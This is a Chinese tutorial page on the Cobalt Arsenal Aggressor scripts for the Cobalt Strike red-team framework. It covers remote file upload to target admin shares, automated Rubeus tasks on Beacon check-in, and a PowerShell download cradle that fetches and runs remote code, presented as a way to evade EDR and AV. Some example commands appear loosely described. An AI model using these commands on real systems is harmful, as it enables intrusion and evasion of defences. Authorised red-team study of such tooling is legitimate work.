Cobalt Arsenal 项目教程
1. 项目介绍
Cobalt Arsenal 是由 Mariusz Banach 开发的一个开源项目,旨在为 Cobalt Strike 提供一系列经过实战检验的 Aggressor 脚本。这些脚本极大地增强了 Cobalt Strike 的功能,使其在红队操作和对手模拟中更加灵活和高效。项目包含了超过 3300 行代码,涵盖了从 Beacon 管理到 Payload 生成等多个方面的实用工具和增强功能。
2. 项目快速启动
2.1 环境准备
在开始之前,确保你已经安装了 Cobalt Strike 4.0 或更高版本,并且熟悉基本的 Aggressor 脚本语法。
2.2 下载与安装
-
克隆项目到本地:
git clone https://github.com/mgeeky/cobalt-arsenal.git
-
将项目中的
.cna
脚本文件复制到 Cobalt Strike 的scripts
目录下。
2.3 加载脚本
在 Cobalt Strike 中,通过 Script Manager
加载所需的 Aggressor 脚本。例如,加载 better-upload.cna
:
script_import "better-upload.cna"
2.4 使用示例
以下是一个简单的使用示例,展示如何使用 better-upload.cna
脚本上传文件到目标主机:
beacon> upload /path/to/local/file.exe \\target\c$\path\to\remote\file.exe
3. 应用案例和最佳实践
3.1 案例一:自动化初始任务
使用 Beacon_Initial_Tasks.cna
脚本,可以在 Beacon 首次签到时自动执行预定义的任务。例如,设置初始任务为执行一个 PowerShell 命令:
beacon> set_initial_tasks "execute-assembly C:\\tools\\Rubeus.exe hash /password:test"
3.2 案例二:自定义 PowerShell 下载执行
使用 custom-powershell-hooks.cna
脚本,可以自定义 PowerShell 下载和执行的命令,避免被常见的 EDR 和 AV 检测:
beacon> set POWERSHELL_DOWNLOAD_CRADLE "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')"
4. 典型生态项目
4.1 Cobalt Strike 官方社区工具包
Cobalt Strike 官方提供了一个社区工具包(Community Kit),其中包含了大量由社区贡献的 Aggressor 脚本和工具,可以与 Cobalt Arsenal 结合使用,进一步提升红队操作的效率。
4.2 Outflank Security Tooling
Outflank Security Tooling 是一个精选的进攻性安全工具集,设计用于增强 Cobalt Strike 的规避能力。通过与 Cobalt Strike 结合使用,可以扩展红队操作的范围和深度。
4.3 Core Impact
Core Impact 是 Fortra 提供的一款渗透测试工具,可以与 Cobalt Strike 协同工作,共享资源并部署 Beacon 进行会话传递和隧道功能。结合使用可以提供更全面的渗透测试解决方案。
鸿蒙开发工具大赶集
本仓将收集和展示鸿蒙开发工具,欢迎大家踊跃投稿。通过pr附上您的工具介绍和使用指南,并加上工具对应的链接,通过的工具将会成功上架到我们社区。012hertz
Go 微服务 HTTP 框架,具有高易用性、高性能、高扩展性等特点。Go01每日精选项目
🔥🔥 每日精选已经升级为:【行业动态】,快去首页看看吧,后续都在【首页 - 行业动态】内更新,多条更新哦~🔥🔥 每日推荐行业内最新、增长最快的项目,快速了解行业最新热门项目动态~~029kitex
Go 微服务 RPC 框架,具有高性能、强可扩展的特点。Go00Cangjie-Examples
本仓将收集和展示高质量的仓颉示例代码,欢迎大家投稿,让全世界看到您的妙趣设计,也让更多人通过您的编码理解和喜爱仓颉语言。Cangjie057毕方Talon工具
本工具是一个端到端的工具,用于项目的生成IR并自动进行缺陷检测。Python040PDFMathTranslate
PDF scientific paper translation with preserved formats - 基于 AI 完整保留排版的 PDF 文档全文双语翻译,支持 Google/DeepL/Ollama/OpenAI 等服务,提供 CLI/GUI/DockerPython06mybatis-plus
mybatis 增强工具包,简化 CRUD 操作。 文档 http://baomidou.com 低代码组件库 http://aizuda.comJava03国产编程语言蓝皮书
《国产编程语言蓝皮书》-编委会工作区018- DDeepSeek-R1探索新一代推理模型,DeepSeek-R1系列以大规模强化学习为基础,实现自主推理,表现卓越,推理行为强大且独特。开源共享,助力研究社区深入探索LLM推理能力,推动行业发展。【此简介由AI生成】Python00
热门内容推荐
最新内容推荐
项目优选









